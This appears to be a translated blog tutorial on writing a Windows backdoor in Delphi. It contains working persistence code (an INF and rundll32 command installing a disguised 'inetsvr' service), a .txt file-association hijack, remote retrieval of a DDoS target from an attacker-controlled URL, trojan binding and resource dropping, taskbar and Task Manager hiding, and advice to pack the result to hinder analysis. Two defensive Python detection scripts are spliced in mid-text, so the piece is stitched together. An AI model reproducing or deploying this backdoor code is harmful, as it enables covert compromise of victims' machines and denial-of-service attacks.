Author: Delphiscn (cnBlaster # sohu.com)
http://blog.9cbs.net/delphiscn
Note: these are just preliminary study notes.
Contents
1. Foreword
2. System startup
3. File association
4. Attack control
5. File hiding
6. Demonstration
1. Foreword

There are countless system backdoor programs around today, but they share a common problem: they are very easily caught at system startup, and against the personal firewalls I have run into, such as Tianwang or Jinshan Net Dart, they basically get nowhere. An article called "Do All In Cmd Shell" has been circulating on the Internet, and what it describes works on essentially any NT-based system (2000/XP). Here I use Delphi, imitating some of the classic backdoor programs, to write a backdoor. I hope to exchange programming experience with the experts; it is also a write-up of things I learned earlier :)
2. System startup

When it comes to starting with the system, many friends will probably think at once of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and the load= line in Win.ini. That is correct, but from a practical point of view these startup methods are a bit dated now. And if your program does a great deal but fails at startup, isn't that very depressing? Here, following the idea of the author of "Do All In Cmd Shell", we write an INF file and use it to register a system service. That way our backdoor starts together with the system as a service, without anyone noticing. (This method has a limitation: it only applies to NT/2000/XP.) The author's original text is quoted here:
Now let us add a system service with an INF:

[Version]
Signature="$WINDOWS NT$"

[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name

[My_AddService_Name]
DisplayName=Windows Internet Service
Description=Provides support for Internet Information Services management.
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe

Save this as inetsvr.inf, then run:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %systemroot%\system32\inetsvr.inf

(Here I have modified the original text slightly.) [Note: %systemroot% is an environment variable. If your system folder is C:\Windows, then %systemroot% expands to C:\Windows (generally 98 or XP); if your system folder is C:\Winnt, it expands to C:\Winnt.]

This example adds a service named inetsvr (it looks very much like a service that ships with the system, heh). Some explanation:

1. The last four entries are, in order, the service type, the start type, the error control and the binary location. Service type: 0x10 is a service running in its own process, 0x20 is a shared-process service (such as SVCHOST). Start type: 0 loaded by the boot loader, 1 loaded during OS initialisation, 2 started automatically by the SCM (Service Control Manager), 3 started manually, 4 disabled. (Note: 0 and 1 can only be used for drivers.) Error control: 0 ignore, 1 continue with a warning, 2 switch to the LastKnownGood configuration, 3 blue screen. Binary location: %11% is the System32 directory, %10% is the system directory (WinNT or Windows), %12% is the driver directory System32\Drivers. See the DDK for other values. You can also write a full path directly without these variables. These four entries are mandatory.

2. Besides the six entries in the example there are also LoadOrderGroup, Dependencies and so on, but they are rarely used, so I will not introduce them.

3. There are two commas after inetsvr because an uncommon parameter, Flags, sits between them.

Deleting a service:

[Version]
Signature="$WINDOWS NT$"

[DefaultInstall.Services]
DelService=inetsvr

Simple, isn't it?
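As an added example (not part of the quoted article or of the backdoor itself), the following Python script parses an INF of the form shown above and reports what an InstallHinfSection DefaultInstall run would register: the service name, the Flags field between the two commas, and the four mandatory entries decoded to their SCM constant names, with %10%/%11%/%12% expanded. The sample INF is the one from the quoted text, embedded as a constructed string; the C:\WINDOWS system root is an assumption for offline use, and triage() lists the properties a responder wants surfaced when such a file turns up unexpectedly.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Win32 SCM constants; INF files write them in decimal or 0x-prefixed hex.
SERVICE_TYPES = {0x1: "KERNEL_DRIVER", 0x2: "FILE_SYSTEM_DRIVER",
                 0x10: "WIN32_OWN_PROCESS", 0x20: "WIN32_SHARE_PROCESS"}
START_TYPES = {0: "BOOT_START", 1: "SYSTEM_START", 2: "AUTO_START",
               3: "DEMAND_START", 4: "DISABLED"}
ERROR_CONTROLS = {0: "IGNORE", 1: "NORMAL", 2: "SEVERE", 3: "CRITICAL"}
# Setup API directory IDs used in ServiceBinary. The system root is an
# assumption so this runs offline; a real install resolves it on the host.
SYSTEM_ROOT = r"C:\WINDOWS"
DIRIDS = {"10": SYSTEM_ROOT, "11": SYSTEM_ROOT + r"\system32",
          "12": SYSTEM_ROOT + r"\system32\drivers"}
Section = List[Tuple[str, str]]  # ordered (key, value) pairs, keys lower-cased


@dataclass
class ServiceSpec:
    name: str
    flags: str
    display_name: str
    service_type: int
    start_type: int
    error_control: int
    binary: str


def parse_inf(text: str) -> Dict[str, Section]:
    """';' comments stripped, section names lower-cased, duplicate keys kept."""
    sections: Dict[str, Section] = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None and "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            sections[current].append((key.lower(), value.strip('"')))
    return sections


def first(section: Section, key: str, default: str = "") -> str:
    return next((v for k, v in section if k == key), default)


def expand_dirids(path: str) -> str:
    return re.sub(r"%(\d+)%", lambda m: DIRIDS.get(m.group(1), m.group(0)), path)


def services_from_inf(text: str) -> List[ServiceSpec]:
    """Every service an 'InstallHinfSection DefaultInstall' run would add."""
    sections = parse_inf(text)
    specs = []
    for key, value in sections.get("defaultinstall.services", []):
        if key != "addservice":
            continue
        # AddService=ServiceName,[Flags],install-section[,event-log-section...]
        parts = [p.strip() for p in value.split(",")]
        name, flags, install = parts[0], parts[1], parts[2]
        inst = sections[install.lower()]
        specs.append(ServiceSpec(
            name=name, flags=flags, display_name=first(inst, "displayname"),
            service_type=int(first(inst, "servicetype", "0"), 0),
            start_type=int(first(inst, "starttype", "0"), 0),
            error_control=int(first(inst, "errorcontrol", "0"), 0),
            binary=expand_dirids(first(inst, "servicebinary"))))
    return specs


def triage(spec: ServiceSpec) -> List[str]:
    """Decoded summary plus the properties a responder wants surfaced."""
    notes = [f"{spec.name} ('{spec.display_name}'): "
             f"{SERVICE_TYPES.get(spec.service_type, hex(spec.service_type))}, "
             f"{START_TYPES.get(spec.start_type, spec.start_type)}, "
             f"ErrorControl {ERROR_CONTROLS.get(spec.error_control, spec.error_control)}, "
             f"binary {spec.binary}"]
    if spec.start_type in (0, 1, 2):
        notes.append("starts without user action at every boot")
    if spec.error_control == 0:
        notes.append("ErrorControl=0 (IGNORE): start failures are not logged")
    if spec.binary.lower().startswith(DIRIDS["11"].lower() + "\\"):
        notes.append("binary lives in System32 next to genuine service binaries")
    return notes


# Constructed input: the INF from the quoted text above.
SAMPLE_INF = r"""
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=Provides support for Internet Information Services management.
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe
"""

if __name__ == "__main__":
    for spec in services_from_inf(SAMPLE_INF):
        print("\n".join(triage(spec)))
```

Run against an INF recovered from a host, the first triage line is what to compare with the output of sc qc on that machine; a service whose decoded binary path does not match what the SCM actually reports was altered after installation.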
The next step is to invoke this INF from Delphi to install the service. We can use the ShellExecute function for this; the concrete call is:

ShellExecute(Handle, nil, 'rundll32.exe',
  'setupapi,InstallHinfSection DefaultInstall 128 %systemroot%\system32\inetsvr.inf',
  nil, SW_SHOWNORMAL);

(The program name goes in the lpFile argument and the rest of the command line in lpParameters. Note that it is cmd.exe that expands %systemroot% when you type the line at a prompt; ShellExecute passes the parameter string through unchanged, so from Delphi it is safer to build the absolute path with GetWindowsDirectory, as mentioned below.)

I think SW_SHOWNORMAL is not ideal here, because with this parameter the window of the cmd shell is visible; I don't know whether anyone has a better way? However, I think ShellExecute has one benefit: if it cannot find the INF, nothing shows on the screen; simply put, it does not report an error :) Of course, if you do not feel reassured, you can use the GetWindowsDirectory function to locate the INF file absolutely, but I think it is fine as it is.

Doubt: our ServiceType=0x10 is a standalone-process service. I estimate such a program will be intercepted by the firewall when it accesses the network. Shared-process services such as svchost and lsass are not; if we change ServiceType to 0x20 I think the situation will change, but I have not researched this in depth.

3. File association

Following convention, we can also modify the .txt file association, pointing the registry value at our backdoor program. The following code does that :)

uses Windows, Registry;

procedure HijackTxtAssociation;
var
  Backdoor: TRegistry;
  FileExt, FileType, FileDescription, ExecName, WinDir: string;
begin
  FileExt := '.txt';
  FileType := 'Text Document';
  FileDescription := 'Text Document';
  // Get the Windows directory and build the path of our program
  SetLength(WinDir, MAX_PATH);
  SetLength(WinDir, GetWindowsDirectory(PChar(WinDir), MAX_PATH));
  ExecName := WinDir + '\System32\inetsvr.exe';   // inetsvr.exe is our program
  Backdoor := TRegistry.Create;                    // create the registry object
  try
    Backdoor.RootKey := HKEY_CLASSES_ROOT;         // registry root key
    // Create the extension key; failure here is usually a registry error, so exit
    if not Backdoor.OpenKey(FileExt, True) then Exit;
    Backdoor.WriteString('', FileType);            // point the extension at the file type
    Backdoor.CloseKey;
    if not Backdoor.OpenKey(FileType, True) then Exit;   // open/create the file type key
    Backdoor.WriteString('', FileDescription);     // write the description
    // Relative path: opened under the current key, i.e. FileType\shell\open\command
    if not Backdoor.OpenKey('shell\open\command', True) then Exit;
    Backdoor.WriteString('', ExecName);            // the command the shell runs
    Backdoor.CloseKey;
  finally
    Backdoor.Free;                                 // release the registry object
  end;
end;

From now on, whenever the user double-clicks a .txt file, our inetsvr.exe starts again.

4. Attack control

A few days ago I saw an example that used a BAT batch file to control the program to attack someone's website. I have not fully understood his example, but we can replace the BAT with other means. Let us implement the process: first apply for some homepage space (say http://www.attack.com/delphiscn) and upload a file ipaddress.txt whose content is 192.168.0.1, where 192.168.0.1 is the address of the site we want to attack. Then add the following in Delphi (NMHTTP is a TNMHTTP component from the FastNet palette placed on the form):

var
  IPAddress: string;
begin
  NMHTTP.Get('http://www.attack.com/delphiscn/ipaddress.txt');
  IPAddress := Trim(NMHTTP.Body);   // the address is text, not an integer
end;

Our program thus obtains the address IPAddress to attack, and that address stays under our control :) Next comes the attack itself: we can add code to the program that sends packets to 192.168.0.1 until the remote server refuses to respond, which is the DDoS so often talked about. You could also use a ping-like method; as that is relatively simple I will not go into detail here.
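Given the hijack described in section 3, a defender wants the reverse check. The Python script below is an added example, not part of the original post: it follows the extension -> ProgID -> shell\open\command chain the way the shell does and flags a handler that is not on an expected list, or a command line that never receives %1. The two registry snapshots are constructed dictionaries (the stock XP mapping, and the state the Delphi code above leaves behind); live_reader() is an optional Windows-only reader for a real HKEY_CLASSES_ROOT hive.

```python
import ntpath
from typing import Callable, List, Optional, Tuple

ReadDefault = Callable[[str], Optional[str]]  # HKCR key path -> (Default) value

# Constructed snapshots of HKEY_CLASSES_ROOT (assumptions standing in for a
# real export): the stock Windows XP mapping and the post-hijack state.
CLEAN_HKCR = {
    ".txt": "txtfile",
    "txtfile": "Text Document",
    r"txtfile\shell\open\command": r"%SystemRoot%\system32\NOTEPAD.EXE %1",
}
HIJACKED_HKCR = {
    ".txt": "Text Document",
    "Text Document": "Text Document",
    r"Text Document\shell\open\command": r"C:\WINDOWS\System32\inetsvr.exe",
}

# Handlers a practitioner expects per extension; extend from a known-good baseline.
EXPECTED_HANDLERS = {".txt": {"notepad.exe"}}


def resolve_open_command(ext: str, read_default: ReadDefault
                         ) -> Tuple[Optional[str], Optional[str]]:
    """Follow extension -> ProgID -> shell\\open\\command as the shell does."""
    progid = read_default(ext)
    if not progid:
        return None, None
    return progid, read_default(progid + r"\shell\open\command")


def executable_of(command: str) -> str:
    """Executable token of a command line: quoted path or first word, lower-cased."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)].lower()
    return (command.split() or [""])[0].lower()


def check_association(ext: str, read_default: ReadDefault) -> List[str]:
    progid, command = resolve_open_command(ext, read_default)
    if command is None:
        return [f"{ext}: no shell\\open\\command under ProgID {progid!r}"]
    findings = []
    exe = ntpath.basename(executable_of(command))  # strips %SystemRoot%\... too
    if exe not in EXPECTED_HANDLERS.get(ext, set()):
        findings.append(f"{ext}: handler {exe!r} (via ProgID {progid!r}) "
                        "is not an expected handler")
    if "%1" not in command:
        findings.append(f"{ext}: command {command!r} never receives the "
                        "document, so the double-clicked file will not open")
    return findings


def live_reader() -> ReadDefault:
    """Reader for the real HKCR hive; winreg only exists on Windows."""
    import winreg

    def read_default(path: str) -> Optional[str]:
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, path) as key:
                return winreg.QueryValueEx(key, "")[0]
        except OSError:
            return None
    return read_default


if __name__ == "__main__":
    for label, snapshot in (("clean", CLEAN_HKCR), ("hijacked", HIJACKED_HKCR)):
        print(label, check_association(".txt", snapshot.get) or ["ok"])
```

On a live box, call check_association(".txt", live_reader()); the same function runs unchanged over an exported snapshot, which is the form most incident data arrives in.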
5. File hiding

If your design is more elaborate there may be more than one executable, and we cannot build an installer the way shareware does. The simplest way is the command COPY /B setup.exe+run.exe set.exe, which appends the program you need to run to the end of the first executable. setup.exe then has two duties: the first is to display something plausible so that nobody realises this is a Trojan installer; the second, its real purpose, is to cut the Trojan service program out of itself from a known offset and run its installation. Because the Trojan service part uses "invisible" techniques, it goes unnoticed. The code is just locating and copying bytes, so I will not describe it here.

Another way is to put the Trojan into a resource file (RES) in advance, store it inside the current executable, and release it at a suitable moment. The following code releases the specified file from the RES:

procedure RunVirus(ResType: PChar; FileTo: string);
var
  TempDir: string;
  Buf: Pointer;
  Size: Longint;
  H: HMODULE;
  ResHandle: HRSRC;
  Zip: file;
begin
  H := GetModuleHandle(nil);                       // our own executable
  TempDir := '';                                   // release next to the executable
  ResHandle := FindResource(H, MAKEINTRESOURCE(1), ResType);  // resource 1 of type ResType
  if ResHandle = 0 then Exit;                      // resource not linked in
  Buf := LockResource(LoadResource(H, ResHandle));
  Size := SizeOfResource(H, ResHandle);
  AssignFile(Zip, TempDir + FileTo);
  Rewrite(Zip, 1);                                 // untyped file, 1-byte records
  try
    BlockWrite(Zip, Buf^, Size);
  finally
    CloseFile(Zip);
  end;
end;

The resource file test.rc is made as follows:
* Content: 1 DAT "test.exe"
* Build: brcc32 test.rc
* Include: after {$R *.dfm} add {$R test.res}. If you do not add this line, an error is reported when the Trojan is released, so be sure to pay attention to this :)
* Call: if not FileExists('test.exe') then RunVirus('DAT', 'test.exe');

In addition, here are several commonly used tips.

Invisible in the Task Manager application list: clear the application title:

program Project1;
uses
  Forms,
  Unit1 in 'Unit1.pas' {Form1};
{$R *.res}
begin
  Application.Title := '';   // an empty title keeps it off the Applications tab
  Application.Initialize;
  Application.CreateForm(TForm1, Form1);
  Application.Run;
end.

Tool-window style (keeps the program off the taskbar): use the SetWindowLong function:

SetWindowLong(Application.Handle, GWL_EXSTYLE, WS_EX_TOOLWINDOW);

Preventing repeated runs: when writing a service program it is often necessary to keep it from being executed more than once, because a second copy would use the same IP address and the same port, and a conflict is inevitable.
So, to keep the program from being started twice, we can add the following code to the program's startup. Suppose our program title is Neverland:

program Neverland;
uses
  Forms, Windows, SysUtils,
  Unit1 in 'Unit1.pas' {Form1};
{$R *.res}
var
  hMutex: THandle;
  Ret: Integer;
begin
  Application.Initialize;
  Application.Title := 'Neverland';
  // A named mutex is visible system-wide; a second instance finds it already there
  hMutex := CreateMutex(nil, False, 'Neverland');
  Ret := GetLastError;   // must be read immediately after CreateMutex
  if Ret <> ERROR_ALREADY_EXISTS then
  begin
    Application.CreateForm(TForm1, Form1);
    Application.Run;
  end
  else
    CloseHandle(hMutex);  // we never owned it, so close the handle rather than ReleaseMutex
end.

With the above done, a system backdoor program is basically complete. Of course, if you are interested you can extend it further. Finally, don't forget to pack it with ASPack; that makes things harder for others. If you have any good ideas or methods, feel free to discuss them with everyone :)
Reference: "Do All in Cmd Shell", http://www.hackeronline.cn/showart.asp?art_id=476&cat_id=7